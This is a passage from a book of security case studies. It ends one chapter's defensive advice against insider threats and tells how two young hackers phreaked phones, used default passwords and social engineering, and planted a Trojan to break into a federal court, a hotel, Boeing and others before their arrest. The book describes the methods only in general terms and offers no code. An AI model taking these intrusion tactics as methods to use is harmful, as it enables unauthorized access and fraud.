  It should be routine practice to put restrictions on an employee’s
  access prior to his/her being notified of a termination, demotion,
  or undesirable transfer. Also, consider monitoring the employee’s
  computer usage to determine any unauthorized or potentially
  harmful activities.
Installation of unauthorized hardware. The malicious insider can
  easily access another employee’s cubicle and install a hardware or
  software keystroke logger to capture passwords and other confiden-
  tial information. Again, a flash drive makes stealing data easy. A
  security policy that prohibits any introduction of hardware devices
  without written permission, while justified in some circumstances,
  is admittedly difficult to police; benign employees will be inconve-
  nienced, while the malicious have no incentive for paying attention
  to the rule.
                   Chapter 3   The Texas Prison Hack                65

 In certain organizations that work with extremely sensitive infor-
 mation, removing or disabling the USB port on workstations may
 be a necessary control.
 Walk-around inspections should be conducted regularly. In particular,
 these inspections should verify that the machines have not had unau-
 thorized wireless devices, hardware keystroke loggers, or modems
 attached, and that no software has been installed except as authorized.
 Security or IT personnel can check for unauthorized wireless access
 points in the immediate vicinity by using a PDA that supports
 802.11, or even a laptop equipped with Microsoft XP and a wire-
 less card. Microsoft XP has a built in zero-configuration utility that
 pops up a dialogue box when it detects a wireless access point in
 the immediate vicinity.
Circumventing processes. As employees learn about critical business
 processes within the organization, they’re in a good position to
 identify any weaknesses with the checks and balances used to detect
 fraud or theft. A dishonest worker is in a position to steal or cause
 other significant harm based on their knowledge of how the business
 operates. Insiders usually have unfettered access to offices, file cabi-
 nets, internal mailing systems, and have knowledge of the day-to-
 day business procedures.
 Consider analyzing sensitive and critical business processes to iden-
 tify any weaknesses so countermeasures can be implemented. In
 certain situations, developing separation of duties requirement in
 the process, where a sensitive operation performed by one person is
 checked independently by another, can reduce the security risk.
On-site visitor policies. Establish a security policy for outside visi-
 tors, including workers from other office locations. An effective
 security control is to require visitors to present State-issued
 identification prior to being allowed into the facility, and recording
 the information in a security log. If a security incident should arise,
 it may be possible to identify the perpetrator.
Software inventory and auditing. Maintain an inventory of all
 authorized software installed or licensed for each system and peri-
 odically audit these systems for compliance. This inventory process
 not only ensures legal compliance with software licensing regulations,
 but also may be used to identify any unauthorized software installa-
 tions that could negatively affect security.
 Unauthorized installation of malicious software like keystroke log-
 gers, adware, or others type of spyware are hard to detect, depend-
 ing on how clever the developers were at hiding the program
 within the operating system.
 66                        The Art of Intrusion


   Consider using third-party commercial software to identify these
   malicious types of programs, such as the following:
     ● Spycop (available at www.spycop.com)
     ● PestPatrol (available at www.pestpatrol.com)
     ● Adware (available from www.lavasoftusa.com)
  Audit systems for software integrity. Employees or malicious insid-
   ers could replace critical operating system files or applications that
   could be used by bypass security controls. In this story, the inmate
   hackers had changed the PC Anywhere application to run without
   displaying an icon in the system tray so they would not be detected.
   The prison officials in this story never realized that their every move
   was periodically being monitored while Danny and William virtually
   looked over their shoulders.
   In some circumstances, it may be appropriate to conduct an
   integrity audit, and to use a third-party application that notifies the
   appropriate staff when any changes are made to system files and
   applications on the “watch list.”
  Excessive privileges. In Windows-based environments, many end-
   users are logged into accounts with local administrator rights on
   their own machines. This practice, while more convenient, makes it
   very easy for a disgruntled insider to install a keystroke logger or
   networking monitoring (sniffer) on any systems where he has local
   administrator privileges. Remote attackers also may send malicious
   programs hidden within an email attachment that may be opened
   by the unsuspecting user. The threat posed by these attachments
   can be minimized by using the “least privilege” rule, which means
   that users and programs should run with the fewest privileges nec-
   essary to perform their required tasks.


THE BOTTOM LINE
In some situations, common sense dictates that elaborate security pre-
cautions are a waste of time. In a military school, for example, you would
not expect the student body to be filled with people looking for every
possible opportunity to cheat or challenge the rules. In an elementary
school, you would not expect ten-year-olds to be more knowledgeable
about computer security than the staff technology guru.
   And in a prison, you would not expect that inmates, closely watched,
living under a set of rigid rules, would find the means not just to work
their way onto the Internet but then to spend hours at a time, day after
                     Chapter 3   The Texas Prison Hack                 67

day, enjoying music, movies, communications with the opposite sex, and
learning more and more about computers.
  The moral: If you are in charge of information security for any school,
workgroup, company, or other entity — you have to assume that some
malicious adversary, including someone inside your organization — is
looking for that small crack in the wall, the weakest link of your security
chain to break your network. Don’t assume that everyone is going to play
by the rules. Do what is cost-effective to prevent potential intrusions, but
don’t forget to keep looking out for what you missed. The bad guys are
counting on you to be careless.
             Chapter 4
                 Cops and Robbers
I walked into this classroom full of law enforcement officers and said, “Do
you guys recognize any of these names?” I read off a list of the names. One
federal officer explained, “Those are judges in the U.S. District Court in
Seattle.” And I said, “Well, I have a password file here with 26 passwords
cracked.” Those federal officers about turned green.
                                           — Don Boelling, Boeing Aircraft




M
               att and Costa weren’t planning an attack on Boeing Aircraft;
               it just turned out that way. But the outcome of that incident
               and others in their chain of hacker activities stand as a warn-
ing. The two could be the poster boys in a campaign to warn other kid
hackers too young to appreciate the consequences of their actions.
   Costa (pronounced “COAST-uh”) Katsaniotis started learning about
computers when he got a Commodore Vic 20 at age 11 and began pro-
gramming to improve the machine’s performance. At that tender age, he
also wrote a piece of software that allowed his friend to dial up and see a
list of the contents of his hard drive. “That’s where I really started with
computers and loving the what-makes-things-work aspect of having a
computer.” And not just programming: He probed the hardware,
unworried, he said, about losing the screws “because I started out taking
things apart when I was three.”
   His mother sent him to a Christian private school until eighth grade and
then to a public school. At that age his tastes in music leaned toward U2
(it was his first album and he’s still a big fan), as well as Def Leppard and
“some of the darker music”; meanwhile his tastes in computing were
expanding to include “getting into what I could do with phone numbers.”

                                      69
 70                            The Art of Intrusion


A couple of older kids had learned about 800-WATS extenders, phone
numbers they could use to make free long-distance calls.
 Costa loved computers and had a natural understanding of them.
Perhaps the absence of a father heightened the teen’s interest in a world
where he enjoyed complete control.

      Then in high school I kinda took a break and I figured out what
      girls were. But I still always had my passion for computers and
      always kept those close at hand. I really didn’t start taking off
      with the hacking until I had a computer that could handle it and
      that was the Commodore 128.

  Costa met Matt — Charles Matthew Anderson — on a BBS (bulletin
board system) in the Washington state area. “We were friends for I think
probably a year via telephone and messaging on these bulletin boards
before we actually even met.” Matt — whose handle is “Cerebrum” —
describes his childhood as “pretty normal.” His father was an engineer at
Boeing and had a computer at home that Matt was allowed to use. It’s
easy to imagine the father so uncomfortable with the boy’s preferences in
music (“industrial and some of the darker stuff”) that he overlooked what
the dangerous path Matt was following on the computer.

      I started learning how to program basic when I was about nine
      years old. I spent most of my teenage years getting into graphics
      and music on the computer. That’s one of the reasons I still like com-
      puters today — the hacking on that multimedia stuff is really fun.
      I first got into the hacking stuff in my senior year in high school,
      getting into the phreaking side of it, learning how to take advan-
      tage of the telephone network that was used by the teachers and
      administrators to make long distance calls. I was heavily into
      that in my high school years.

  Matt finished high school among the top 10 in his class, entered the
University of Washington, and began learning about legacy computing:
mainframe computing. At college, with a legitimate account on a Unix
machine, he started teaching himself about Unix for the first time, “with
some help from the underground bulletin-board and web sites.”


Phreaking
After they became a team, it seemed as if Matt and Costa were leading
each other in the wrong direction, down the road of hacking into the
telephone system, an activity known as “phreaking.” One night, Costa
remembers, the two went on an expedition that hackers call “dumpster
                        Chapter 4   Cops and Robbers                    71

diving,” scouring through the trash left outside the relay towers of the cell
phone companies. “In the garbage amongst coffee grounds and other
stinky stuff, we got a list of every tower and each phone number” — the
phone number and electronic serial number, or ESN, that is a unique
identifier assigned to each cell phone. Like a pair of twins remembering a
shared event from childhood, Matt chimes in: “These were test numbers
that the technicians would use to test signal strengths. They would have
special mobile phones that would be unique to that tower.”
   The boys bought OKI 900 cells phones and a device to burn new pro-
gramming onto the computer chips in the phones. They did more than
just program new numbers; while they were at it, they also installed a spe-
cial firmware upgrade that allowed them to program any desired phone
number and ESN number into each of the phones. By programming the
phones to the special test numbers they had found, the two were provid-
ing themselves free cell phone service. “The user chooses which number
he wants to use for placing a call. If we had to we could switch through
to another number real quick,” Costa said.
   (This is what I call “the Kevin Mitnick cellular phone plan” — zero a
month, zero a minute, but you may end up paying a heavy price at the
end, if you know what I mean.)
   With this reprogramming, Matt and Costa could make all the cell
phone calls they wanted, anywhere in the world; if the calls were logged
at all, they would have gone on the books as official business of the cell
company. No charges, no questions. Just the way any phone phreaker or
hacker likes it.


Getting into Court
Landing in court is about the last thing any hacker wants to do, as I know
only too well. Costa and Matt got into court early in their hacking
together, but in a different sense.
  Besides dumpster diving and phone phreaking, the two friends would
often set their computers war dialing, looking for dial-up modems that
might be connected to computer systems they could break into. They could
between them check out as many as 1,200 phone numbers in a night. With
their machines dialing non-stop, they could run through an entire telephone
prefix in two or three days. When they returned to their machines, the com-
puter logs would show what phone numbers they had gotten responses
from. “I was running my wardialer to scan a prefix up in Seattle, 206-553,”
Matt said. “All those phone numbers belong to federal agencies of some sort
or another. So just that telephone prefix was a hot target because that’s
where you would find the federal government computers.” In fact, they had
no particular reason for checking out government agencies.
 72                         The Art of Intrusion


      Costa: We were kids. We had no master plan.
      Matt: What you do is you just kinda throw the net out in the sea
      and see what kind of fish you come back with.
      Costa: It was more of a “What can we do tonight?” type thing,
      “What can we scan out tonight?”

  Costa looked at his war dialer log one day and saw that the program
had dialed into a computer that returned a banner reading something like
“U.S. District Courthouse.” It also said, “This is federal property,” He
thought, “This looks juicy.”
  But how to get into the system? They still needed a username and pass-
word. “I think it was Matt that guessed it,” Costa says. The answer was
too easy: Username: “public.” Password: “public.” So there was “this
really strong, scary banner” about the site being federal property, yet no
real security barring the door.
  “Once we were into their system, we got the password file,” Matt says.
They easily obtained the judges’ sign-on names and passwords. “Judges
would actually review docket information on that court system and they
could look at jury information or look at case histories.”
  Sensing the risk, Matt says, “We didn’t explore too far into the court.”
At least, not for the moment.


Guests of the Hotel
Meanwhile, the guys were busy in other areas. “One of the things we also
compromised was a credit union. Matt discovered a pattern in the num-
bers for their codes that made it easy for us to make telephone calls” at
the association’s expense. They also had plans to get into the computer
system of the Department of Motor Vehicles “and see what kind of dri-
ver’s licenses and stuff we could do.”
  They continued to hone their skills and break into computers. “We
were on a lot of computers around town. We were on car dealerships.
Oh, and there was one hotel in the Seattle area. I had called them and
acted like I was a software technician for the company that made the
hotel reservation software. I talked to one of the ladies at the front desk
and explained that we were having some technical difficulties, and she
wouldn’t be able to do her job correctly unless she went ahead and made
a few changes.”
  With this standard, familiar social engineering gambit, Matt easily
found out the logon information for the system. “The username and
password were ‘hotel’ and ‘learn.’” Those were the software developers’
default settings, never changed.
                       Chapter 4   Cops and Robbers                       73

  The break-in to the computers of the first hotel provided them a learn-
ing curve on a hotel reservations software package that turned out to be
fairly widely used. When the boys targeted another hotel some months
later, they discovered that this one, too, might be using the software they
were already familiar with. And they figured this hotel might be using the
same default settings. They were right on both counts. According to Costa:

     We logged into the hotel computer. I had a screen basically just
     like they would have right there in the hotel. So I logged in and
     booked a suite, one of the top $300 a night suites with a water
     view and the wet bar and everything.
     I used a fake name, and put a note that a $500 cash deposit had
     been made on the room. Reserved for a night of hell-raising. We
     basically stayed there for the whole weekend, partied, and emptied
     out the mini bar.

  Their access to the hotel’s computer system also gave them access to
information on guests who had stayed at the hotel, “including their
financial information.”
  Before checking out of the hotel, the boys stopped by the front desk
and tried to get change from their “cash deposit.” When the clerk said
the hotel would send a check, they gave him a phony address and left.
  “We were never convicted of that,” Costa says, adding, “Hopefully the
statute of limitations is up.” Any regrets? Hardly. “That one had a little
bit of a payoff in that wet bar.”


Opening a Door
After that wild weekend, the emboldened boys went back to their com-
puters to see what else they could do with the hack into the District
Court. They quickly found out that the operating system for the court
computer had been purchased from a company we’ll call Subsequent.
The software had a built-in feature that would trigger a phone call to
Subsequent anytime software patches were needed — for example, “If a
customer of a Subsequent computer bought a firewall and the operating
system needed patches for the firewall to run, the company had a method
for logging in to their corporate computer system to get the patches.
That’s basically how it was back then,” Costa explained.
  Matt had a friend, another C programmer, who had the skills to write
a Trojan — a piece of software that provides a secret way for a hacker to
get back onto a computer he has made his way into earlier. This was very
handy if passwords are changed or other steps are taken to block access.
Through the computer at the District Court, Matt sent the Trojan to the
 74                          The Art of Intrusion


Subsequent corporate computer. The software was designed so that it
would also “capture all the passwords and write them to a secret file, as
well as allow us a root [administrator access] bypass in case we ever got
locked out.”
  Getting into the Subsequent computer brought them an unexpected
bonus: access to a list of other companies running the Subsequent oper-
ating system. Pure gold. “It told us what other machines we could
access.” One of the companies named on the list was a giant local firm,
the place where Matt’s father worked: Boeing Aircraft.
  “We got one of the Subsequent engineer’s username and password,
and they worked on the boxes that he had sold Boeing. We found we had
access to login names and passwords to all the Boeing boxes,” Costa said.
  The first time Matt called the phone number for external connections
to the Boeing system, he hit a lucky break.

      The last person that called in hadn’t hung up the modem properly
      so that when I dialed in I actually had a session under some user.
      I had some guy’s Unix shell and it’s like, “Wow, I’m suddenly into
      the guy’s footprint.”

  (Some early dial-up modems were not configured so they would auto-
matically log off the system when a caller hung up. As a youngster, when-
ever I would stumble across these types of modem configurations, I
would cause the user’s connection to be dropped by either sending a
command to a telephone company switch, or by social engineering a
frame technician to pull the connection. Once the connection was bro-
ken, I could dial in and have access to the account that was logged in at
the time of the dropped connection. Matt and Costa, on the other hand,
had simply stumbled into a connection that was still live.)
  Having a user’s Unix shell meant that they were inside the firewall, with
the computer in effect standing by, waiting for him to give instructions.
Matt recalls:

      So immediately I went ahead and cracked his password and then
      I used that on some local machines where I was able to get root
      [system administrator] access. Once I had root, we could use some
      of the other accounts, try going onto some of the other machines
      those people accessed by looking at their shell history.

  If it was a coincidence that the modem just happened to online when
Matt called, what was going on at Boeing when Matt and Costa started
their break-in to the company was an even greater coincidence.
                       Chapter 4   Cops and Robbers                   75


Guarding the Barricades
At that moment, Boeing Aircraft was hosting a high-level computer secu-
rity seminar for an audience that included people from corporations, law
enforcement, FBI, and the Secret Service.
   Overseeing the session was Don Boelling, a man intimate with Boeing’s
computer security measures and the efforts to improve them. Don had
been fighting the security battles internally for a number of years. “Our
network and computing security was like everywhere else, it was basically
zip. And I was really concerned about that.”
   As early as 1988, when he was with the newly formed Boeing
Electronics, Don had walked into a meeting with the division president
and several vice presidents and told them, “Watch what I can do with
your network.” He hacked modem lines and showed that there were no
passwords on them, and went on to show he could attack whatever
machines he wanted. The executives saw one computer after another that
had a guest account with a password of “guest.” And he showed how an
account like that makes it easy to access the password file and download
it to any other machine, even one outside the company.
   He had made his point. “That started the computing security program at
Boeing,” Don told us. But the effort was still in its infancy when Matt and
Costa began their break-ins. He had been having “a hard time convincing
management to really put resources and funding into computing security.”
The Matt and Costa episode would prove to be “the one that did it for me.”
   His courageous role as a spokesman for security had led to Don organ-
izing the groundbreaking computer forensics class at Boeing. “A gov-
ernment agent asked us if we wanted to help start a group of law
enforcement and industry people to generate information. The organiza-
tion was designed to help train law enforcement in computer technology
forensics, involving high-tech investigations techniques. So I was one of
the key players that helped put this together. We had representatives from
Microsoft, US West, the phone company, a couple of banks, several dif-
ferent financial organizations. Secret Service agents came to share their
knowledge of the high-tech aspects of counterfeiting.”
   Don was able to get Boeing to sponsor the sessions, which were held
in one of the company’s computer training centers. “We brought in
about thirty-five law enforcement officers to each week-long class on how
to seize a computer, how to write the search warrant, how to do the
forensics on the computer, the whole works. And we brought in Howard
Schmidt, who later was recruited onto the Homeland Security force,
answering to the President for cyber-crime stuff.”
   On the second day of the class, Don’s pager went off. “I called back
the administrator, Phyllis, and she said, ‘There’s some strange things
 76                          The Art of Intrusion


going on in this machine and I can’t quite figure it out.” A number of
hidden directories had what looked like password files in them, she
explained. And a program called Crack was running in the background.
  That was bad news. Crack is a program designed to break the encryp-
tion of passwords. It tries a word list or a dictionary list, as well as per-
mutations of words like Bill1, Bill2, Bill3 to try to discern the password.
  Don sent his partner, Ken (“our Unix security guru”) to take a look.
About an hour later, Ken paged Don and told him, “You better get up
here. This looks like it might be pretty bad. We’ve got numerous pass-
words cracked and they don’t belong to Boeing. There’s one in particu-
lar you really need to look at.”
  Meanwhile, Matt had been hard at work inside the Boeing computer
networks. Once he had obtained access with system administrator privi-
leges, “it was easy to access other accounts by looking into some of the
other machines those people had accessed.” These files often had tele-
phone numbers to software vendors and other computers the machine
would call. “A primitive directory of other hosts that were out there,”
says Matt. Soon the two hackers were accessing the databases of a variety
of businesses. “We had our fingers in a lot of places,” Costa says.
  Not wanting to leave the seminar, Don asked Ken to fax down what he
was seeing on the administrator’s screen. When the transmission arrived,
Don was relieved not to recognize any of the user IDs. However, he was
puzzled over the fact that many of them began with “Judge.” Then it
hit him:

      I’m thinking, “Oh my God!” I walked into this classroom full of
      law enforcement officers and said, “Do you guys recognize any of
      these names?” I read off a list of the names. One federal officer
      explained, “Those are judges in the U.S. District Court in
      Seattle.” And I said, “Well, I have a password file here with 26
      passwords cracked.” Those federal officers about turned green.

 Don watched as an FBI agent he’d worked with in the past made a few
phone calls.

      He calls up the U.S. District Court and gets hold of the system
      administrator. I can actually hear this guy on the other end of the
      line going, “No, no way. We’re not connected to the Internet.
      They can’t get our password files. I don’t believe it’s our
      machine.” And Rich is saying, “No, it is your machine. We’ve got
      the password files.” And this guy is going, “No, it can’t happen.
      People can’t get into our machines.”
                       Chapter 4   Cops and Robbers                        77

  Don looked down at the list in his hand and saw that the root pass-
word — the top-level password known only to system administrators —
had been cracked. He pointed it out to Rich.

     Rich says into the telephone, “Is your root password ‘2ovens’?”
     Dead silence on the other end of the line. All we heard was a
     “thunk” where this guy’s head hit the table.

  As he returned to the classroom, Don sensed a storm brewing. “I said,
‘Well, guys, it’s time for some on-the-job real life training.’”
  With part of the class tagging along, Don prepared for battle. First, he
went to the computer center in Bellevue where the firewall was located.
“We found the account that was actually running the Crack program, the
one the attacker was logging in and out of, and the IP address he was
coming from.”
  By this time, with their password-cracking program running on the
Boeing computer, the two hackers had moved into the rest of Boeing’s
system, “spider-webbing” out to access hundreds of Boeing computers.
  One of the computers that the Boeing system connected to wasn’t even
in Seattle. In fact, it was on the opposite coast. According to Costa:

     It was one of the Jet Propulsion lab computers at NASA’s Langley
     Research Labs in Virginia, a Cray YMP5, one of the crown jew-
     els. That was one of our defining moments.
     All kinds of things cross your mind. Some of the secrets could make
     me rich, or dead, or really guilty.

  The folks in the seminar were taking turns watching the fun in the
computer center. They were stunned when the Boeing security team dis-
covered their attackers had gotten access to the Cray, and Don could
hardly believe it. “We were able to very quickly, within an hour or two,
determine that access point and the access points to the firewall.”
Meanwhile, Ken set up virtual traps on the firewall in order to determine
what other accounts the attackers had breached.
  Don rang the local phone company and asked to have a “trap and
trace” put on the Boeing modem lines that the attackers were using. This
is a method that would capture the phone number that the calls were
originating from. The telephone people agreed without hesitation.
“They were part of our team and knew who I was, no questions asked.
That’s one of the advantages of being on these law enforcement teams.”
  Don put laptops in the circuits between the modems and the comput-
ers, “basically to store all the keystrokes to a file.” He even connected
 78                          The Art of Intrusion


Okidata printers to each machine “to print everything they did in real
time. I needed it for evidence. You can’t argue with paper like you can
with an electronic file.” Maybe it’s not surprising when you think about
which a panel of jurors is more likely to believe: an electronic file or a
document printed out at the very time of the incident.
  The group returned to the seminar for a few hours where Don outlined
the situation and defensive measures taken. The law enforcement officers
were getting hands-on, graduate-level experience in computer forensics.
“We went back up to do some more work and check on what we had,
and while I was standing there with two federal officers and my partner,
the modem goes off. Bingo, these guys came in, logged in on the
account,” Don said.
  The local phone company tracked Matt and Costa to their homes. The
team watched as the hackers logged into the firewall. They then trans-
ferred over to the University of Washington, where they logged in to
Matt Anderson’s account.
  Matt and Costa had taken precautions that they thought would protect
their calls from being traced. For one thing, instead of dialing Boeing
directly, they were calling into the District Court computers and then
routing a call from the Court to Boeing. They figured that “if there was
someone monitoring us at Boeing, they were probably having a rough
time figuring out where our call was originating from,” Costa said.
  They had no idea their every move was being watched and recorded as
Matt dialed into the Court, from there to Boeing, and then transferred
to his personal student account.

      Since we were so new on [the District Court] system and the pass-
      word and user name were “public,” at the time I didn’t think it
      was a threat, or I was being lazy. That direct dial is what gave
      them the trace to my apartment and that’s where everything
      fell apart.

  Don’s team felt like the proverbial fly on the wall as Matt started read-
ing the email on his student account. “In this guy’s email is all this stuff
about their hacker exploits and responses from other hackers.”

      The law enforcement officers are sitting there laughing their asses
      off, ’cause these are basically arrogant kids, not considering
      they’d get caught. And we’re watching them real time produce
      evidence right there in our hands.

 Meanwhile, Don was ripping the sheets off the printer, having every-
body sign as a witness, and sealing then as evidence. “In less than six
                        Chapter 4   Cops and Robbers                      79

hours from the point we knew we had this intrusion, we already had these
guys on criminal trespass.”
   Boeing management was not laughing. “They were scared out of their
wits and wanted the hackers terminated — ‘Get them off the computers
and shut all this off right now.’” Don was able to convince them it would
be wiser to wait. “I said, ‘We don’t know how many places these guys
have gotten into. We need to monitor them for a while and find out what
the heck is going on and what they’ve done.’” When you consider the
risk involved, it was a remarkable testament to Don’s professional skills
that management capitulated.


Under Surveillance
One of the federal officers attending the seminar obtained warrants for tap-
ping Matt and Costa’s telephones. But the wiretaps were only one part of
the effort. By this time the federal government was taking the case very
seriously. The action had assumed aspects of a spy movie or a crime thriller:
FBI agents were sent to the campus in teams. Posing as students, they fol-
lowed Matt around campus, noting his actions so they would later be able
to testify that at some particular time, he was using one particular computer
on campus. Otherwise it would be easy to claim, “That wasn’t me — lots
of people use that computer every day.” It had happened before.
  On the Boeing side, the security team took every precaution they could
think of. The goal wasn’t to keep the boys out but to watch closely, con-
tinuing to gather evidence while making sure they didn’t do any damage.
Don explains, “We had all of our computers’ main entry points set up to
where either the system administrator or the computer would page us
and let us know some activity was going on.” The pager’s beep became
a cry to “battle stations.” Team members immediately notified select
individuals on a call list to let them know the hackers were on the prowl
again. Several times, Don’s group electronically tracked Matt and Costa’s
activity through the University of Washington — where key staff had
been briefed — all the way through the Internet, from point to point. It
was like being beside the two as they made the actual break in.
  Don decided to watch them for another four or five days because “basi-
cally we had them fairly well contained and they weren’t doing anything
that I would consider extremely dangerous, though they had consider-
able access and could have if they wanted to.”
  But Costa soon learned something was up:

     One night my girlfriend and I were sitting in my apartment
     watching TV. It was a summer night, and the window was open,
     and it’s funny but she looked outside ... and noticed a car in the
 80                           The Art of Intrusion


      parking lot of the Pay & Save. Well, about an hour later, she
      looked out again and said, “There’s a car outside with guys in it
      that was out there an hour ago.”

   Costa turned off the TV and lights and proceeded to videotape the FBI
agents watching his place. A little later, he saw a second car pull up next
to the first one. The men in the two cars discussed something and then
both drove off.
   The next day, a team of officers showed up at Costa’s apartment. When
he asked, they acknowledged that they didn’t have a warrant, but Costa
wanted to look like he was cooperating so didn’t object to being inter-
viewed. He didn’t object, either, when they asked him to call Matt and
draw him out about the cell phone activities, while they recorded the
conversation.
   Why was he willing to call his closest friend and talk about their illegal
activities with law enforcement listening in? Simple: Joking around one
night, playing a variation of “What if?” the two had actually anticipated a
situation in which it might be hazardous to talk freely and had devised a
code. If one of them dropped “nine, ten” into the conversation, it would
mean “Danger! watch what you say.” (They chose the number as easy to
remember, being one less than the emergency phone number, 911.)
   So with the phone tapped and the recorder running, Costa dialed Matt.
“I called you a few minutes ago, at nine-ten, and couldn’t get through,”
he began.


Closing In
The Boeing surveillance team had by now discovered the hackers were
not only getting into the U.S. District Court, but also into the
Environmental Protection Agency. Don Boelling went to the EPA with
the bad news. Like the system administrator for the U.S. District Court,
the EPA guys were skeptical of any infringement of their system.

      We’re telling them their machines were compromised and to them
      it was inconceivable. They’re saying, “No, no.” I happened to
      bring the password file with 10 or 15 passwords cracked, and I tell
      them the network administrator’s password.
      They’re about ready to throw up because it turns out that all six-
      hundred–odd machines across the U.S. are attached to the
      Internet by the same account. It was a system privilege root
      account and they all had the same password.
                       Chapter 4   Cops and Robbers                       81

  The law enforcement people attending the computer security seminar
were getting far more than they had bargained for. “For the guys that
didn’t go out with us in the field,” Don said, “every day we’d go back to
the classroom and detail what we did. They were getting a firsthand
account of everything that was going on with the case.”


The Past Catches Up
Because he was impressed with the skill that the hackers had shown, Don
was surprised to learn that they had just two months earlier been in court
on other charges, resulting in Costa receiving that sentence to 30 days of
work release.
  And yet here they were back to breaking the law as if invulnerable.
How come? Costa explained that he and Matt were already worried
because there was so much more to the original case than the prosecu-
tors had found out.

     It was kind of a big snowball where they only found a little piece
     of ice. They didn’t know that we were doing the cell phones, they
     didn’t know that we had credit card numbers, they didn’t know
     the scope of what they had caught us for. Because Matt and I had
     already talked about our case, we talked about what we were
     going to tell them. And so we had pled out to this computer tres-
     pass and it was just kinda like a “ha-ha” to us. It was stupid.


On the News
Don was driving from Bellevue to the Boeing’s South Central facility
where his office was when he got a shock. “I had KIRO news on and all
of a sudden I hear this breaking story that two hackers have busted into
Boeing and there’s a federal investigation. I’m thinking, ‘Damn!’”
  The story had been leaked by a Boeing employee unhappy with the
decision to watch Matt and Costa’s activities rather than arrest them
immediately, Don later found out. Don raced to his office and called
everyone involved. “I said, ‘Look, this whole thing has broke! It’s on the
news! We gotta do something now.’ Howard Schmidt was there and being
an expert on writing search warrants for computers, he stepped in and
helped them so they got it right — so there wasn’t any question about it.”
  In fact, Don wasn’t too upset about the leak. “We were pretty close to
busting them anyway. We had plenty, tons of evidence on these guys.”
But he suspected there was even more that hadn’t come to light yet.
“There’s a few things we figured they were into, like credit card fraud.
 82                        The Art of Intrusion


Later on they did get caught for that. I think it was six months or a year
later that the Secret Service nailed them.”


Arrested
Costa knew it had to be coming soon, and he wasn’t surprised by the
heavy-handed knock on his apartment door. By then he had already dis-
posed of four notebooks full of incriminating evidence. At that point he
had no way of knowing that, thanks to Don Boelling, the Feds had all the
evidence they would ever need to convict him and Matt.
   Matt remembers seeing the story about a computer break-in at Boeing
on television at his parents’ home. Around 10 P.M., there was a knock on
the front door. It was two FBI agents. They interviewed him in the din-
ing room for about two hours while his parents slept upstairs. Matt didn’t
want to wake them. He was scared to.
   Don Boelling would have gone along on the arrest if he could have.
Despite all his good connections, he wasn’t invited. “They weren’t too
keen about having civilians go on the actual bust.”
   Boeing was concerned to learn that one of the hackers had a name that
matched an employee’s. Matt was not happy to see his father dragged into
the mess. “Since Dad worked at Boeing and we share the same name, he
actually was interrogated.” Costa was quick to point out that they’d been
careful not to access Boeing using any of Matt’s father’s information. “He
totally kept his dad out of the loop and didn’t want to involve him from
the get-go, even before we ever thought we’d be in trouble.”
   Don was a little miffed when the Special Agent in Charge at the FBI’s
Seattle office was interviewed after the case broke. One of the TV
reporters asked how they had tracked and caught the hackers. The agent
answered something like, “The FBI used technical procedures and tech-
niques too complicated to discuss here.” Don thought to himself,
“You’re full of crap! You didn’t do anything! We did it!’” A whole coor-
dinated group had been involved, people from Boeing;, from other com-
panies; from the District Court; and from local, state, and federal law
enforcement agencies. “This was the first time we’d ever done anything
like this. It was a team effort.”
   Luckily, Matt and Costa had done little damage considering the poten-
tial havoc they could have inflicted. “As far as actually harming Boeing,
they really didn’t do that much,” Don acknowledged. The company got
off easy but wanted to make sure the lesson was learned. “They pled
guilty because basically we had them dead to rights. There was no way
they were getting out of this one,” Don recalls with satisfaction.
   But once again the charges were reduced; this time multiple felony
charges being dropped to “computer trespass.” The two walked out with
                       Chapter 4   Cops and Robbers                        83

another slap on the wrist: 250 hours of community service and five years
probation with no use of computers allowed. The one tough part was
restitution: They were ordered to pay $30,000, most of it to Boeing.
Even though neither was still a juvenile, the boys had been given another
chance.


An End to Good Luck
They hadn’t learned a lesson.

     Costa: Instead of stopping altogether, being stupid kids that we
     were, or not really stupid but naive in the fact that we didn’t
     realize how much trouble we could get in. It was not really greed
     but more of glamour of being able to have a cell phone and use it
     at will.
     Matt: Back in that day it was a big deal. It was a very glitzy item
     to have.

  But the breaks that Matt and Costa were being handed by the criminal
justice system were about to end. And the cause would not be for any
reason they could have anticipated but, of all things, jealousy.
  Costa says his then-girlfriend thought he was cheating on her with
another woman. Nothing of the kind, says Costa; the other lady was “just
a friend, nothing more.” When he wouldn’t give up seeing her, Costa
believes the girlfriend called the authorities and reported that “the
Boeing hackers are selling stolen computers.”
  When investigators showed up at his mother’s home, Costa wasn’t in
but his mother was. “Oh, yes, come on in,” she told them, sure there
would be no harm.
  They didn’t find any stolen property. That was the good news. The bad
news was that they found a scrap of paper that had fallen to the floor and
been lost to sight under the edge of a carpet. On it was a phone number
and some digits that one investigator recognized as an electronic serial
number. A check with the phone company revealed that the information
was associated with a cell phone account that was being used illegally.
  Costa heard about the raid on his mother’s home and decided to drop
out of sight.

     I was on the run for five days from the Secret Service — they had
     jurisdiction over cellular phone fraud. I was a fugitive. And so I
     was actually staying at a friend’s apartment in Seattle and they
     had actually come to the apartment looking for me, but the car
 84                          The Art of Intrusion


      that I was driving was still in the name of the person that previ-
      ously owned it, so I didn’t get caught.
      On the fifth or sixth day, I talked to my attorney and I walked
      into the Probation Officer’s office with him and turned myself in.
      I was arrested and taken away.
      Running from the Secret Service — that was a stressful time.

  Matt was picked up, as well. The two found themselves on separate
floors of Seattle’s King County Jail.


Jail Phreaking
This time there would be no trial, the boys learned. Once the investigation
had been finished and the U.S. Attorney’s Office had drawn up the papers,
the pair would go before a federal judge on violation of their probation. No
trial, no chance to put on a defense, and not much hope of leniency.
   Meanwhile they would each be questioned in detail. They knew the
drill: Keep the bad guys separated and trip them up when they tell dif-
ferent stories.
   Matt and Costa found that jail, for them at least, was a harder place
than prison to serve time. “County jail is the worst, like no other place.
I was threatened by a couple of people,” says Costa. “I actually got in a
fight. If you don’t bark back, then you’re gonna get chewed up.” Matt
remembers getting punched. “I think it was because I didn’t get off the
phone. So, lesson learned.”
   Jail was hard in another way. Costa recalls:

      [It was] not knowing what was next, ’cause we had gotten in
      trouble already and we knew we were in trouble way more. It was
      fear of the unknown more than fear of the inmates. They just said
      “lock ’em up” and there was no bail, no bond. It was a Federal
      hold. We had no idea where we were going from there and we were
      indefinitely locked up.

   Jails generally have two types of telephones: pay phones where conver-
sations are monitored to make sure inmates are not plotting something
illegal and phones that connect directly to the Public Defenders Office so
that inmates can talk to their lawyers.
   At the Seattle jail, calls to the Public Defenders are dialed from a list of
two-digit codes. Matt explained, “But if you call after hours, what do you
get? You’re in their voicemail system and you can enter as many touch
